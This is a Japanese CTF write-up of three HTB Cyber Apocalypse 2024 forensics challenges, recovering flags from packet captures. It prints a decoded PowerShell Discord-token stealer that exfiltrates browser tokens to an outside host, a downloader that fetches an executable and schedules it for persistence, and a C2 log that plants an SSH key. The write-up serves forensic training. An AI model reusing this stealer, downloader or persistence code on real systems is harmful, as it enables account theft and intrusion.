# HTB Cyber Apocalypse CTF 2024 (Forensics) ## Fake Boost (Solved) > HTB{fr33_N17r0G3n_3xp053d!_b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5} * pcapngファイルが与えられる。 * TCP STREAM 3 に、怪しい文字列が見つかる。 ![image](https://hackmd.io/_uploads/H1QWqg5TT.png) * その後の処理から、文字列を逆順にしてBase64デコードしているので、その通りにやってみる。 ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-fake-boost$ echo "9ByXkACd1B <中略> CI9ACTSVFJ" | rev | base64 -d $URL = "http://192.168.116.135:8080/rj1893rj1joijdkajwda" function Steal { param ( [string]$path ) $tokens = @() try { Get-ChildItem -Path $path -File -Recurse -Force | ForEach-Object { try { $fileContent = Get-Content -Path $_.FullName -Raw -ErrorAction Stop foreach ($regex in @('[\w-]{26}\.[\w-]{6}\.[\w-]{25,110}', 'mfa\.[\w-]{80,95}')) { $tokens += $fileContent | Select-String -Pattern $regex -AllMatches | ForEach-Object { $_.Matches.Value } } } catch {} } } catch {} return $tokens } function GenerateDiscordNitroCodes { param ( [int]$numberOfCodes = 10, [int]$codeLength = 16 ) $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' $codes = @() for ($i = 0; $i -lt $numberOfCodes; $i++) { $code = -join (1..$codeLength | ForEach-Object { Get-Random -InputObject $chars.ToCharArray() }) $codes += $code } return $codes } function Get-DiscordUserInfo { [CmdletBinding()] Param ( [Parameter(Mandatory = $true)] [string]$Token ) process { try { $Headers = @{ "Authorization" = $Token "Content-Type" = "application/json" "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/91.0.864.48 Safari/537.36" } $Uri = "https://discord.com/api/v9/users/@me" $Response = Invoke-RestMethod -Uri $Uri -Method Get -Headers $Headers return $Response } catch {} } } function Create-AesManagedObject($key, $IV, $mode) { $aesManaged = New-Object "System.Security.Cryptography.AesManaged" if ($mode="CBC") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC } elseif ($mode="CFB") {$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CFB} elseif ($mode="CTS") {$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CTS} elseif ($mode="ECB") {$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB} elseif ($mode="OFB"){$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::OFB} $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 if ($IV) { if ($IV.getType().Name -eq "String") { $aesManaged.IV = [System.Convert]::FromBase64String($IV) } else { $aesManaged.IV = $IV } } if ($key) { if ($key.getType().Name -eq "String") { $aesManaged.Key = [System.Convert]::FromBase64String($key) } else { $aesManaged.Key = $key } } $aesManaged } function Encrypt-String($key, $plaintext) { $bytes = [System.Text.Encoding]::UTF8.GetBytes($plaintext) $aesManaged = Create-AesManagedObject $key $encryptor = $aesManaged.CreateEncryptor() $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); [byte[]] $fullData = $aesManaged.IV + $encryptedData [System.Convert]::ToBase64String($fullData) } Write-Host " ______ ______ _ _ _ _ _ _ _____ _____ _____ ___ | ___| | _ (_) | | | \ | (_) | / __ \| _ |/ __ \ / | | |_ _ __ ___ ___ | | | |_ ___ ___ ___ _ __ __| | | \| |_| |_ _ __ ___ `' / /'| |/' |`' / /'/ /| | | _| '__/ _ \/ _ \ | | | | / __|/ __/ _ \| '__/ _` | | . ` | | __| '__/ _ \ / / | /| | / / / /_| | | | | | | __/ __/ | |/ /| \__ \ (_| (_) | | | (_| | | |\ | | |_| | | (_) | ./ /___\ |_/ /./ /__\___ | \_| |_| \___|\___| |___/ |_|___/\___\___/|_| \__,_| \_| \_/_|\__|_| \___/ \_____/ \___/ \_____/ |_/ " Write-Host "Generating Discord nitro keys! Please be patient..." $local = $env:LOCALAPPDATA $roaming = $env:APPDATA $part1 = "SFRCe2ZyMzNfTjE3cjBHM25fM3hwMDUzZCFf" $paths = @{ 'Google Chrome' = "$local\Google\Chrome\User Data\Default" 'Brave' = "$local\BraveSoftware\Brave-Browser\User Data\Default\" 'Opera' = "$roaming\Opera Software\Opera Stable" 'Firefox' = "$roaming\Mozilla\Firefox\Profiles" } $headers = @{ 'Content-Type' = 'application/json' 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/91.0.864.48 Safari/537.36' } $allTokens = @() foreach ($platform in $paths.Keys) { $currentPath = $paths[$platform] if (-not (Test-Path $currentPath -PathType Container)) {continue} $tokens = Steal -path $currentPath $allTokens += $tokens } $userInfos = @() foreach ($token in $allTokens) { $userInfo = Get-DiscordUserInfo -Token $token if ($userInfo) { $userDetails = [PSCustomObject]@{ ID = $userInfo.id Email = $userInfo.email GlobalName = $userInfo.global_name Token = $token } $userInfos += $userDetails } } $AES_KEY = "Y1dwaHJOVGs5d2dXWjkzdDE5amF5cW5sYUR1SWVGS2k=" $payload = $userInfos | ConvertTo-Json -Depth 10 $encryptedData = Encrypt-String -key $AES_KEY -plaintext $payload try { $headers = @{ 'Content-Type' = 'text/plain' 'User-Agent' = 'Mozilla/5.0' } Invoke-RestMethod -Uri $URL -Method Post -Headers $headers -Body $encryptedData } catch {} Write-Host "Success! Discord Nitro Keys:" $keys = GenerateDiscordNitroCodes -numberOfCodes 5 -codeLength 16 ~~~ * `part1`という変数は、使われていないので怪しい。base64っぽい。 ~~~ $part1 = "SFRCe2ZyMzNfTjE3cjBHM25fM3hwMDUzZCFf" ~~~ * フラグの断片が得られた。 ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-fake-boost$ echo "SFRCe2ZyMzNfTjE3cjBHM25fM3hwMDUzZCFf" | base64 -d HTB{fr33_N17r0G3n_3xp053d!_ ~~~ * スクリプトを読んでみると、`http://192.168.116.135:8080/rj1893rj1joijdkajwda`にデータを送っていることがわかる。 * AESで暗号化して、そのあとbase64でエンコードしたデータ * AESの鍵はスクリプト中に書いてある * データを送っている通信は、TCP STREAM 48。 ![image](https://hackmd.io/_uploads/rJjoyZcTa.png) * CyberChefでBase64デコード → AESで復号の順に処理すると、JSONっぽいデータが得られる。 ![image](https://hackmd.io/_uploads/S1c--V9T6.png) * `Email`というラベルなのに、中身がメールアドレスじゃないので怪しい。base64でデコードしてみる。 ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-fake-boost$ echo "YjNXNHIzXzBmX1QwMF9nMDBkXzJfYjNfN3J1M18wZmYzcjV9" | base64 -d b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5} ~~~ * フラグの後半部分が得られたので、前半と後半をくっつけておしまい。 ## Phreaky (Solved) > HTB{Th3Phr3aksReadyT0Att4ck} * pcap ファイルが与えられる。 * TCP STREAM を眺めていると、下図のようなファイルを分割して暗号化zipで送っているようなやり取りが16個見つかる。 ![image](https://hackmd.io/_uploads/rJO_GW5ap.png) * zipファイルに保存→解凍すると、`phreaks_plan.pdf.part1` のような名前のファイルが得られる。 ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-fake-boost/data$ echo "UEsDBAoACQAAAGZ3ZljgCHYp6QAAAN0AAAAWABwAcGhyZWFrc19wbGFuLnBkZi5wYXJ0MlVUCQAD wIToZcCE6GV1eAsAAQToAwAABOgDAABu5iZXFr81bsrANalgCyCYLbnWakpnenTTFtNEgA2DnlWw ZaWTpsDk81VXCv1hWQgylORABff79cZQT4OYwP1bvjYVOf3xgo24EcTU99Feua+8VNmf4BZ0wZ2B Mk3OUz4+F3hTJrWztVJSnQGgFD7O5Bgo7dt2l+MUBn8d+ZA0ETzAzdRV8SBSh4TR0awJzNsiFkq+ fWy7uBX+KuQH8UgOeQbWJAWfI6yoznm1KvkNrGoc4XmEjbJlzQw1T6IoAJCVin1PuFepWgNG3iJi GyLqSwPvW2TMWmbYqCGnBvahxLGmGYxOCaGeLlBLBwjgCHYp6QAAAN0AAABQSwECHgMKAAkAAABm d2ZY4Ah2KekAAADdAAAAFgAYAAAAAAAAAAAAtIEAAAAAcGhyZWFrc19wbGFuLnBkZi5wYXJ0MlVU BQADwIToZXV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAQABAFwAAABJAQAAAAA=" | tr -d "\n" | base64 -d > zip01-r5Q6YQEcGWEF.zip ~~~ * 16個の通信に対して、それぞれzipファイルに保存→解凍したデータをpartの順番にくっつけて元のデータを復元する (もっと良いコマンドはあるような気がする) ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-phreaky/data$ cat phreaks_plan.pdf.part1 phreaks_plan.pdf.part2 phreaks_plan.pdf.part3 phreaks_plan.pdf.part4 phreaks_plan.pdf.part5 phreaks_plan.pdf.part6 phreaks_plan.pdf.part7 phreaks_plan.pdf.part8 phreaks_plan.pdf.part9 phreaks_plan.pdf.part10 phreaks_plan.pdf.part11 phreaks_plan.pdf.part12 phreaks_plan.pdf.part13 phreaks_plan.pdf.part14 phreaks_plan.pdf.part15 >> phreaks_plan.pdf2 ~~~ * 得られたPDFファイルを開くと、最後にフラグが書いてある。 ![image](https://hackmd.io/_uploads/S1g0OWcTT.png) ## Oblique Final ## Cofinement ## Game Invitation ## Data Siege (Solved) > HTB{c0mmun1c4710n5_h45_b33n_r3570r3d_1n_7h3_h34dqu4r73r5} * TCP Stream 2 * どこかから実行ファイルを落としてきて実行するような感じのスクリプトが書いてある。 ![image](https://hackmd.io/_uploads/BkhZ6C9aT.png) * TCP Stream 4 * TCP Stream 2 で指定された実行ファイルをダウンロードする通信。 * WireSharkのエクスポート機能でファイルを保存しておく。 ![image](https://hackmd.io/_uploads/HyrET0cpp.png) * TCP Stream 5 * わけのわからない通信。 * 実行ファイルがダウンロードされた後に発生している通信なので、実行ファイルが出している通信だと思われる。 ![image](https://hackmd.io/_uploads/rkTNAC9TT.png) * 一部 PowerShellのコマンドが書いてあった。base64エンコードされている部分をデコードすると、フラグの断片が得られた。 * どうやらフラグは3分割されているらしい。 ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-data-siege$ echo "CgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwAHMAOgAvAC8AdwBpAG4AZABvAHcAcwBsAGkAdgBlAHUAcABkAGEAdABlAHIALgBjAG8AbQAvADQAZgB2AGEALgBlAHgAZQAiACwAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIAKQAKAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIACgAKACQAdAByAGkAZwBnAGUAcgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAyADoAMAAwAEEATQAKAAoAJABzAGUAdAB0AGkAbgBnAHMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAKAAoAIwAgADMAdABoACAAZgBsAGEAZwAgAHAAYQByAHQAOgAKAAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAwAHIAMwBkAF8AMQBuAF8ANwBoADMAXwBoADMANABkAHEAdQA0AHIANwAzAHIANQB9ACIAIAAtAEEAYwB0AGkAbwBuACAAJABhAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAdAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMACgA=" | base64 -d (New-Object System.Net.WebClient).DownloadFile("https://windowsliveupdater.com/4fva.exe", "C:\Users\svc01\AppData\Roaming\4fva.exe") $action = New-ScheduledTaskAction -Execute "C:\Users\svc01\AppData\Roaming\4fva.exe" $trigger = New-ScheduledTaskTrigger -Daily -At 2:00AM $settings = New-ScheduledTaskSettingsSet # 3th flag part: Register-ScheduledTask -TaskName "0r3d_1n_7h3_h34dqu4r73r5}" -Action $action -Trigger $trigger -Settings $settings ~~~ * 他の通信の内容は下記の通り。base64でデコードしても意味のないデータになったので、多分暗号化か何かされている ~~~ 1BhuY4/niTopIBHAN6vvmQ== gs1pJD3U5aold1QaI/LdE+huVKxpC/azbuWUTstbgrbAU9zWdG7mtO0k+T9Mr0X8OBKR254z6toIOEZjd4PACN8tD+nT2n3Pun5DAbmX31vvI+BHavd4pDHEo26YKaUw F7fKMiKsoErWh0rg6Tr6kQ== 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 3a42oeqqUlDFRMc0fU2izQ== kiEDfJZYAB1sMzIdb5JF5Q== G4zEKBYS3iw2EN5dwLm6+/uQktBYty4nNBdsBxIqyb8= ZKlcDuS6syl4/w1JGgzkYxeaGTSooLkoI62mUeJh4hZgRRytOHq8obQ7o133pBW7BilbKoUuKeTvXi/2fmd4v+gOO/E6A0DGMWiW2+XZ+lkDa97VsbxXAwm0zhunRyBXHuo8TFbQ3wFkFtA3SBFDe+LRYQFB/Kzk/HX/EomfOj2aDYRGYBCHiGS70BiIC/gyNOW6m0xTu1oZx90SCoFel95v+vi8I8rQ1N6Dy/GPMuhcSWAJ8M9Q2N7fVEz92HWYoi8K5Zvge/7REg/5GKT4pu7KnnFCKNrTp9AqUoPuHm0cWy9J6ZxqwuOXTR8LzbwbmXohANtTGso6Dqbih7aai57uVAktF3/uK5nN7EgMSC0ZsUclzPZjm0r4ITE2HtBrRXJ78cUfIbxd+dIDBGts7IuDfjr0qyXuuzw+5o8pvKkTemvTcNXzNQbSWj+5tTxxly0Kgxi5MVT0ecyJfNfdZG0slqYHKaqJCZm6ShfvGRFsglKmenBB274sBdkVqIRtodB8dD1AM1ZQQX1MBMGDeCwFqc+ahch0x375U6Ekmvf2fzCZ/IaHOHBc8p5se1oNMRbIqcJaundh5cuYL/h8p/NPVTK9veu3Qihy310wkjg= uJ2fWsTba0ORtkn2zNOzNQ== Hpn7/+8bhbPtNrDOPNmi90fpHYG70U3N1UJbbLuVBPamvpijHsmWE4/C/Xgrzg7v MVLZZEXaiYxnXr4paESBd7S7kqQMujOq/n6jsr5eBfaDCRSXQMtNa1dLe3iGWvh7qabw+CXRiYtv1VHJNJidUuS5dbMYUK26hJJQJ9crfNBsoaekpIiFxGeZoDM9dIGHSWDHEUuptpB4SIXQZXwdKtL3TAQk/zm+6EXk6xVZEyI0fkymbSGz9fay/vvTLIQhFqVhNnPx30QiLOBtNvGDJzMjKuzngH8Vsv1VhYqKS/vCW2fN2knJRy9RuVyXDzft4FYQRfWCnyGXam+TmI6EKVzEgllOcRlfwit7elWhLgBAnJY/t8AMYHuZSdZE0l7t2MNtm4CRRIdUf9b2v0Z0rxEy7hWWJEkD42OdyVkP8oudjA6w9vqsUkCjKnKw5rXr5XKjzuBwziKeX7K2QkY9x8v5ptrlpO908OPzyPo27xUAY+YrxYubbEpwYyDbVmHETS3Yssgd9IYB1doA0QoI9bYzx1vDdiwtgjoNJlIEnYs= 3BQcww/tA6Mch9bMGZk8uuPzsNLBo8I5vfb3YfHJldljnkES0BVtObZlIkmaryDdqd0me6xCOs+XWWF+PMwNjQ== zVmhuROwQw02oztmJNCvd2v8wXTNUWmU3zkKDpUBqUON+hKOocQYLG0pOhERLdHDS+yw3KU6RD9Y4LDBjgKeQnjml4XQMYhl6AFyjBOJpA4UEo2fALsqvbU4Doyb/gtg FdbfR3mrvbcyK6+9WQcR5A== bsi2k0APOcHI6TMDnO+dBg== Q2zJpoA5nGWWiB2ec1v0aQ== uib3VErvtueXl08f8u4nfQ==24.uib3VErvtueXl08f8u4nfQ== YdPbtpi8M11upjnkrlr/y5tLDKdQBiPWbkgDSKmFCWusn5GFkosc8AYU2M7C1+xEHdMgJ3is+7WW099YpCIArFhDNKRZxAM9GPawxOMI+w3/oimWm9Y/7pjGbcpXcC+2X1MTla0M2nvzsIKPtGeSku4npe8pPGS+fbxwXOkZ5kfZgaN33Nn+jW61VP49dslxvH47v97udYEHm8IO+f7OhCfzetKiulh3PN4tlzIB5I+PBdtDbOXnxHj+ygGW25xjyNh1Fbm2kweHL+qlFmPPtyapWYZMd85tPmRYBwevpvu9LO2tElYAcmFJwG8xc9lc9ca03ha2rIh3ioSNws9grVwFW3SjdcyqoGhcN8cr0FPgu2Q0OVKMdYprjRdEEeptdcBMybcYhHs9jcNKZu0R/pgiSbCPuONN67uF2Jw/9Ss=YdPbtpi8M11upjnkrlr/y5tLDKdQBiPWbkgDSKmFCWusn5GFkosc8AYU2M7C1+xEHdMgJ3is+7WW099YpCIArFhDNKRZxAM9GPawxOMI+w3/oimWm9Y/7pjGbcpXcC+2X1MTla0M2nvzsIKPtGeSku4npe8pPGS+fbxwXOkZ5kfZgaN33Nn+jW61VP49dslxvH47v97udYEHm8IO+f7OhCfzetKiulh3PN4tlzIB5I+PBdtDbOXnxHj+ygGW25xjyNh1Fbm2kweHL+qlFmPPtyapWYZMd85tPmRYBwevpvu9LO2tElYAcmFJwG8xc9lc9ca03ha2rIh3ioSNws9grVwFW3SjdcyqoGhcN8cr0FPgu2Q0OVKMdYprjRdEEeptdcBMybcYhHs9jcNKZu0R/pgiSbCPuONN67uF2Jw/9Ss= ghck5X9x6380mB3aBi+AY7QIEnzhNuF/pDMz9iWssDg= sTRnTjJH0S7yIPUVwWFsNxwMOMxdNiq9OXDRFrCwpPF2UhkfUF0Mw0/YGLpHMCfw zz2ELWwzZYbeI1idIdhMwLyqZ6yatlXwAFOfNGy5QVg= AcABkAGEAdABlAHIALgBjAG8AbQAvADQAZgB2AGEALgBlAHgAZQAiACwAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIAKQAKAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIACgAKACQAdAByAGkAZwBnAGUAcgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAyADoAMAAwAEEATQAKAAoAJABzAGUAdAB0AGkAbgBnAHMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAKAAoAIwAgADMAdABoACAAZgBsAGEAZwAgAHAAYQByAHQAOgAKAAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAwAHIAMwBkAF8 986ztFYX3Ksf2pHdywqpLg== ~~~ * dnSpy でデコンパイルとデバッグを行う。 * `Encrypt`、`Decrypt`という関数があり、それで暗号化、復号を行っている。 * 関数の解析はめんどくさいので、暗号化された文字列を`Decrypt`関数で復号するようにデコンパイル結果を編集して、それを再度コンパイルしたものでデバッグを行う。 * コンソールを起動するタイプのプログラムだったので、コンソールに復号したものを出力するようにした。 ![image](https://hackmd.io/_uploads/rJoe2dhaa.png) * 実行結果がこちら。 ![image](https://hackmd.io/_uploads/ByXq1F3Tp.png) * SSHの鍵を作っているところにフラグの断片が見つかった。 * 似たようなところにフラグの断片が書いてある問題が他にもあった気がする。流行ってんのかな ~~~ cmd;C:\;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 >> C:\Users\svc01\.ssh\authorized_keys ~~~ * 2nd flag part も書いてあった。フラグが揃ったのでおしまい。 ~~~ 2nd flag part: _h45_b33n_r357 ~~~ * 実行結果の全体。 * 一部失敗しているところがあるが、フラグは集まったので気にしない。 ~~~ getinfo-0 infoback;0;10.10.10.22|SRV01|SRV01\svc01|Windows 10 Enterprise Evaluation|0.1.6.1 procview; procview;svchostヲ2060;svchostヲ5316;ApplicationFrameHostヲ4920;csrssヲ388;svchostヲ1372;svchostヲ832;VBoxTrayヲ2748;fontdrvhostヲ684;servicesヲ576;svchostヲ3528;lsassヲ584;svchostヲ6872;svchostヲ1552;spoolsvヲ1748;VBoxServiceヲ1156;svchostヲ760;conhostヲ4108;svchostヲ1152;dllhostヲ6864;svchostヲ2528;svchostヲ1936;Memory Compressionヲ1428;RuntimeBrokerヲ4692;svchostヲ4112;svchostヲ1932;svchostヲ748;smssヲ284;svchostヲ1140;svchostヲ6852;svchostヲ2320;MicrosoftEdgeヲ5076;svchostヲ1332;svchostヲ740;svchostヲ3888;conhostヲ4896;dwmヲ340;javaヲ6052;svchostヲ928;svchostヲ3488;YourPhoneヲ1320;svchostヲ1516;dllhostヲ4204;SearchUIヲ4664;svchostヲ328;winlogonヲ524;SgrmBrokerヲ6628;svchostヲ2096;svchostヲ1504;cmdヲ2488;svchostヲ1304;NisSrvヲ2336;MicrosoftEdgeSHヲ5636;svchostヲ1104;browser_brokerヲ4592;svchostヲ1100;svchostヲ5284;explorerヲ4052;svchostヲ1164;svchostヲ2076;svchostヲ1680;aQ4caZヲ7148;svchostヲ692;svchostヲ100;dumpcapヲ3516;MsMpEngヲ2260;RuntimeBrokerヲ4820;svchostヲ1272;Microsoft.Photosヲ6392;svchostヲ3436;fontdrvhostヲ676;cmdヲ84;taskhostwヲ3628;RuntimeBrokerヲ6188;RuntimeBrokerヲ1384;javaヲ7028;MicrosoftEdgeCPヲ5592;svchostヲ1256;svchostヲ3816;csrssヲ464;Registryヲ68;sihostヲ3416;SecurityHealthSystrayヲ3156;svchostヲ6368;svchostヲ6564;wininitヲ456;ctfmonヲ3940;svchostヲ1636;SecurityHealthServiceヲ844;svchostヲ1040;svchostヲ2024;svchostヲ6980;svchostヲ1628;svchostヲ1824;svchostヲ1288;wlmsヲ2216;RuntimeBrokerヲ5564;svchostヲ5364;svchostヲ1620;svchostヲ2012;svchostヲ396;svchostヲ6540;RuntimeBrokerヲ6780;WindowsInternal.ComposableShell.Experiences.TextInput.InputAppヲ2200;svchostヲ1604;svchostヲ788;svchostヲ1400;uhssvcヲ6824;SearchIndexerヲ5532;svchostヲ4940;svchostヲ3560;svchostヲ1392;svchostヲ1588;svchostヲ1784;wrapperヲ2176;svchostヲ2568;ShellExperienceHostヲ4536;Systemヲ4;conhostヲ2368;OneDriveヲ1184;svchostヲ1472;Idleヲ0; cmd;C:\;hostname cmd;C:\;srv01 cmd;C:\;whoami cmd;C:\;srv01\svc01 cmd;C:\;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 